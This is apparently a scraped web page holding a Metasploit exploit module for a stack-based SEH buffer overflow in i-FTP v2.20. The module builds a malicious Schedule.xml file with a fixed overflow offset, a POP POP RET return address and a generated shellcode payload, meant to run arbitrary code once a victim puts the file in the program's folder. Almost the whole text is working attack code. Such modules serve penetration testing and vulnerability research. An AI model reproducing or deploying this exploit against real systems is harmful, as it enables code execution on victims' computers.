扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 |
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rexml/document' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Seh include REXML def initialize(info = {}) super(update_info(info, 'Name' => 'i-FTP Schedule Buffer Overflow', 'Description'=> %q{ This module exploits a stack-based buffer overflow vulnerability in i-Ftp v2.20, caused by a long time value set for scheduled download. By persuading the victim to place a specially-crafted Schedule.xml file in the i-FTP folder, a remote attacker could execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows XP SP3. }, 'License'=> MSF_LICENSE, 'Author' => [ 'metacom',# Vulnerability discovery and PoC 'Gabor Seljan'# Metasploit module ], 'References' => [ [ 'EDB', '35177' ], [ 'OSVDB', '114279' ], ], 'DefaultOptions' => { 'ExitFunction' => 'process' }, 'Platform' => 'win', 'Payload'=> { 'BadChars' => "\x00\x0a\x0d\x20\x22", 'Space'=> 2000 }, 'Targets'=> [ [ 'Windows XP SP3', { 'Offset' => 600, 'Ret'=> 0x1001eade# POP ECX # POP ECX # RET [Lgi.dll] } ] ], 'Privileged' => false, 'DisclosureDate' => 'Nov 06 2014', 'DefaultTarget'=> 0)) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'Schedule.xml']) ], self.class) end def exploit evil =rand_text_alpha(target['Offset']) evil << generate_seh_payload(target.ret) evil << rand_text_alpha(20000) xml = Document.new xml << XMLDecl.new('1.0', 'UTF-8') xml.add_element('Schedule', {}) xml.elements[1].add_element( 'Event', { 'Url' => '', 'Time' => 'EVIL', 'Folder' => '' }) sploit = '' xml.write(sploit, 2) sploit = sploit.gsub(/EVIL/, evil) # Create the file print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(sploit) end end |
体验盒子
